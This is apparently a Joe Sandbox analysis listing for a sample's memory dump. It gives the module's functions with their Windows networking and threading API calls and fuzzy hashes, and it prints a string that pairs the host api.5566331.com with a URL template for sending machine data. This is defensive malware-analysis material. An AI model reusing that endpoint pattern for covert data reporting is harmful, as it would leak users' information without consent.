
Similarity

API ID: CloseHandle$TerminateThread$Sleep$closesocket$H_prolog
String ID:
API String ID: 3433561863-0
Opcode ID: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
Instruction ID: 825a54de0ef117b15b095b619e3c21a0ce1a9e7865436b8144138b74cdb72a88
Opcode Fuzzy Hash: eb0ec70e1847ada11725b6de51eb09c42151a348a7c83084cfd6c567b3cd2be1
Instruction Fuzzy Hash: 72110A75200B508BE728DF35CC48AA6B7E5EF44385F01482DE19F97165DB78F945CB10

Function 1000236C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10002371

Part of subcall function 1001BC82: __EH_prolog.LIBCMT ref: 1001BC87
Part of subcall function 1001BC82: LocalAlloc.KERNEL32(00000040,00000000,1005ADE8,1005AF8C,1005ADE8,00000000,10168660,00000000,00000000), ref: 1001BCE2
Part of subcall function 1001BC82: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD03
Part of subcall function 1001BC82: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,00000008,00000000,00000000), ref: 1001BD1A

_sprintf.LIBCMT ref: 100023F4

Strings

/index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s, xrefs: 100023EE
api.5566331.com, xrefs: 10002430

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prologLocal$AllocByteCharFreeMultiWide_sprintf
String ID: /index.php/inface/Indexnew?d=%s&member_id=%s&stamptime=%d&data=%s$api.5566331.com
API String ID: 1886346375-2983348053
Opcode ID: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
Instruction ID: ac0105269a1a7c84a4e52344445157f79487e8b33dc675cb9405ff6c2244ed2b
Opcode Fuzzy Hash: 58c1d8fbe5a03cb1d147068550ba185dd112fd127cca21f8f0551514cb59fe1a
Instruction Fuzzy Hash: 89218175900148ABEB14DFA4CC55EDEB778EF14384F404469F406A7182EB70AE44CBE1

Function 10017B26 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10017B2B

Part of subcall function 10018235: __EH_prolog.LIBCMT ref: 1001823A
Part of subcall function 10018235: std::locale::_Init.LIBCPMT ref: 100182C4

Part of subcall function 10017D97: __EH_prolog.LIBCMT ref: 10017D9C

Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4

Part of subcall function 1001A313: _wprintf.LIBCMT ref: 1001A334
Part of subcall function 1001A313: send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
Part of subcall function 1001A313: WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 10017BC6

Part of subcall function 1003293B: std::ios_base::_Tidy.LIBCPMT ref: 1003295B

Strings

Content-Length, xrefs: 10017B73
inc\http\HttpConnection.cpp, xrefs: 10017B38

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$_wprintfstd::ios_base::_$ErrorInitIos_base_dtorLastTidysendstd::locale::_
String ID: Content-Length$inc\http\HttpConnection.cpp
API String ID: 918007117-3146130545
Opcode ID: 24fab065c903b3dd983afc7dceb8c9ef11f553ad663bb2b64f721690f0fc7afb
Instruction ID: 75a4cd840f36df8d2ac12fee9985095fe0ae56a02b47657bfe69f213c4d39a4c
Opcode Fuzzy Hash: 24fab065c903b3dd983afc7dceb8c9ef11f553ad663bb2b64f721690f0fc7afb
Instruction Fuzzy Hash: A8110636900204ABD715E768CD13BEEB7B8EF41350F10015EF105AB192DB306F88C792

Function 1001A1E1 Relevance: 6.1, APIs: 4, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001A1E6
recv.WS2_32(?,?,00400000,00000000), ref: 1001A215
WSAGetLastError.WS2_32 ref: 1001A21F
recv.WS2_32(?,?,00400000,00000000), ref: 1001A2F7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: recv$ErrorH_prologLast
String ID:
API String ID: 1189367603-0
Opcode ID: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
Instruction ID: b4c2601fb093304271381bf4d6a57f627c918c8f1ebe356989ccf57b4cacec91
Opcode Fuzzy Hash: 5e304acbd74c9f060009b39717d57cf9600db593700376564ddc8e3238e0392b
Instruction Fuzzy Hash: 22314871900659EFDB10CBE8CC81BEEBBF8FF19354F10452AE416A7191DB74AA45CB60

Function 1001C12C Relevance: 6.1, APIs: 4, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001C131
__mbsinc.LIBCMT ref: 1001C177
PathIsDirectoryA.SHLWAPI(?), ref: 1001C1B5
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,1000E095,?,1005C6FC,?,?,?), ref: 1001C1D0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Directory$CreateH_prologPath__mbsinc
String ID:
API String ID: 3676323035-0
Opcode ID: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
Instruction ID: 39af0d0c7e0004fa6f05bf9c636e80e62591e6cbe11adbc1e24eaa1d211b549f
Opcode Fuzzy Hash: 035b1e21f1d2bbd3d14b555b90e1b5be1c2c80bfd006bb547435f7c0cc31543b
Instruction Fuzzy Hash: 2F310836940549BFEB11CB68C890FDEBBA8EF42394F154169E4456B1C2DF70EE88CB90

Function 1000DA3F Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5

_malloc.LIBCMT ref: 1000DAD5

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_malloc.LIBCMT ref: 1000DAEF
_malloc.LIBCMT ref: 1000DB04
_malloc.LIBCMT ref: 1000DB1D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateCreateGuidHeap_fprintf
String ID:
API String ID: 995246934-0
Opcode ID: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
Instruction ID: 0c794dbf93a883c59379ebb3549ba63955cc03bc23cb9c033a601534a3face92
Opcode Fuzzy Hash: bb442244e72e22da4d7f3cb7c7dc31e939c401801904e2133fa1fff62a849eae
Instruction Fuzzy Hash: 7231AFB4901B00DED361EF2A9584787FBE8EFA4390F11491FE4AA96661DBB4B540CF60

Function 1001DF6A Relevance: 6.0, APIs: 4, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001DF7C
WSAGetLastError.WS2_32(?,1001E0B2), ref: 1001DF89
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001DFAB
setsockopt.WS2_32(?,0000FFFF,00001006,000003E8,00000004), ref: 1001DFBF

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: setsockopt$ErrorLastsocket
String ID:
API String ID: 1825786771-0
Opcode ID: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
Instruction ID: b2fa6c4f3e2365603d35b98d26ebd87122be398151743637c1c9ce2e762f7076
Opcode Fuzzy Hash: 1a59164a0e9f48adf7641a0f3a4528e9988e322c87277efcff72568403c9b408
Instruction Fuzzy Hash: 9BF06DB154421ABFF710AB64CC8AF99BB6CDB08765F204325F312960E0DBF09E409621

Function 10003256 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100032C6

Strings

req, xrefs: 1000328C
string too long, xrefs: 100032ED

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: req$string too long
API String ID: 4104443479-3134357765
Opcode ID: 0770ad2f473ed246a5382bbde7f0ad539806e4e39fa84f15cf5e637b602ddf2b
Instruction ID: f34db192f8e0fa3b1fa1e0aeedf2e1d9bd4896eeb5cd9540ea6668629b64f2b9
Opcode Fuzzy Hash: 0770ad2f473ed246a5382bbde7f0ad539806e4e39fa84f15cf5e637b602ddf2b
Instruction Fuzzy Hash: E111B231300740ABEB35DEA9D84195BB7EDEF427D0B10892EF956CB249CB71E908C7A0

Function 10011988 Relevance: 4.7, APIs: 3, Instructions: 190threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001198D
__time64.LIBCMT ref: 100119AE

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10011C4E: __EH_prolog.LIBCMT ref: 10011C53

Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8

Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950

Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C

Part of subcall function 1000236C: __EH_prolog.LIBCMT ref: 10002371
Part of subcall function 1000236C: _sprintf.LIBCMT ref: 100023F4

CreateThread.KERNEL32(00000000,00000000,1000D4AD,?,00000000,00000000), ref: 10011BBE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$LocalTime_memmove_sprintf$AllocByteCharCreateFileFreeMultiSystemThreadWide__aulldiv__time64char_traits
String ID:
API String ID: 2736727069-0
Opcode ID: 2284227b271104c13a36550e6f4ef396fbd15695afdfbb145b2e9933fca94256
Instruction ID: 580e3e4189418ba42efff9c301c6a522281fecc5959f66fff071016f5e044300
Opcode Fuzzy Hash: 2284227b271104c13a36550e6f4ef396fbd15695afdfbb145b2e9933fca94256
Instruction Fuzzy Hash: B2718434900258EEEB14DBA4CD95BEDB7B8EF14340F50459AE40A77186EB706F89CFA1

Function 1001EAC0 Relevance: 4.6, APIs: 3, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10025E20: GetNativeSystemInfo.KERNELBASE(?,93656AD3,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E61
Part of subcall function 10025E20: GetNativeSystemInfo.KERNEL32(?,?,?,?,10050CCE,000000FF,?,1001EB0B,93656AD3), ref: 10025E7C

GetNativeSystemInfo.KERNEL32(?,93656AD3,0000000F), ref: 1001EB35
HeapCreate.KERNELBASE(00000000,00000000,00000000), ref: 1001EBD0
_free.LIBCMT ref: 1001EC31

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem$CreateHeap_free
String ID:
API String ID: 3771285432-0
Opcode ID: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
Instruction ID: 084453f00552fd9cdcf573a0b57787ee67f97c677d196269d3afbad7c3934e3d
Opcode Fuzzy Hash: 1e23d421bf4e264bfc0fb7f400e109bcfeb3f31abeb715072edda35998fe9cf1
Instruction Fuzzy Hash: 7951B4B0814B40DFE761CF25C948787BBE4FB09308F504A1DD8AA8BB90D7B9A548CF85

Function 100056F0 Relevance: 4.6, APIs: 3, Instructions: 97synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 10005734
ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 100057EF
Sleep.KERNELBASE(00000001), ref: 10005810

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleSleepWait
String ID:
API String ID: 2685543577-0
Opcode ID: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
Instruction ID: e715972c45bbafa45bd51ed1e775cbe0a086c7abb003f9553e746b27f7d06d24
Opcode Fuzzy Hash: df1283a9f5abd3997303220ddb6a8fcc7d2dc6e6c10f47cb207e2c6f176f9dd1
Instruction Fuzzy Hash: 2231B535604B41DFEB24DF24C885A5BB7E4FF44391F108A2DE9AE972A5DB31A900CB52

Function 100022F0 Relevance: 4.5, APIs: 3, Instructions: 46networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 1000230B
gethostbyname.WS2_32(?), ref: 1000233D
inet_ntoa.WS2_32(?), ref: 1000234E

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnameinet_ntoa
String ID:
API String ID: 289322838-0
Opcode ID: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
Instruction ID: 592dd81a24b4693bc26b9f645d6de9898b1e2dcdf9a12e457dba177d0956e45d
Opcode Fuzzy Hash: 9ebd9e9a71669bdd643d1d02bb31ae1036113e812a7643cec50d709a30c8e0a0
Instruction Fuzzy Hash: B901A4355001297BEB11DB64CC49EEE73EDEF49360F0441A5F905C7194EBB4EE858A60

Function 100075EF Relevance: 4.5, APIs: 3, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1000E186: __EH_prolog.LIBCMT ref: 1000E18B
Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1B1
Part of subcall function 1000E186: _rand.LIBCMT ref: 1000E1BE
Part of subcall function 1000E186: __time64.LIBCMT ref: 1000E1C7
Part of subcall function 1000E186: _sprintf.LIBCMT ref: 1000E228

TerminateThread.KERNEL32(?,00000000,75920F10,00000001,?,100060CA,00000000,?), ref: 10007627
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000030,?,00000000,00000030), ref: 10007630
CreateThread.KERNELBASE(00000000,00000000,Function_0001D6D7,?,00000000,00000000), ref: 10007643

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Thread__time64$CloseCreateH_prologHandleTerminate_rand_sprintf
String ID:
API String ID: 1419693727-0
Opcode ID: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
Instruction ID: 4a25103f81a40976197cae3d50368f644efecd2bc1ee7d5a155f56b6d39a0099
Opcode Fuzzy Hash: 95d38cc3f9d54e5267e6f74dba200e2d308b9b5cb5c8347e607d3961f31fc1cb
Instruction Fuzzy Hash: 49F049B1801B94AFF7209F658D88993BBE8FB042D5B04482EE5CB02A11C63AAC04CB60

Function 1001E0D0 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
CloseHandle.KERNEL32(?), ref: 1001E0FE
CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Thread$CloseCreateHandleTerminate
String ID:
API String ID: 214294483-0
Opcode ID: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
Instruction ID: 2dd09b30243e208cee3be36777b7a391327da2b40f2e85d95d0c5eab96f726e9
Opcode Fuzzy Hash: 10cf28f626f110404d6837ab319e7110993f05b6c1678dd3a35f428a08d84ec9
Instruction Fuzzy Hash: 8EF05E75404BD4BEE3629B6A8DC8A57FBDCFB45398F05142DF18286921C6B0FCC68721

Function 1001DF0D Relevance: 4.5, APIs: 3, Instructions: 33networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 1001DF22
gethostbyname.WS2_32(?), ref: 1001DF38
inet_ntoa.WS2_32(?), ref: 1001DF4A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnameinet_ntoa
String ID:
API String ID: 289322838-0
Opcode ID: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
Instruction ID: 809eef93411cdc36f9b95217684b62963118020cb64196cb20eb42ce4d12313c
Opcode Fuzzy Hash: d03101918194e361efec2291544e3ca20fe63c34b8596ac0bc19394161e466ae
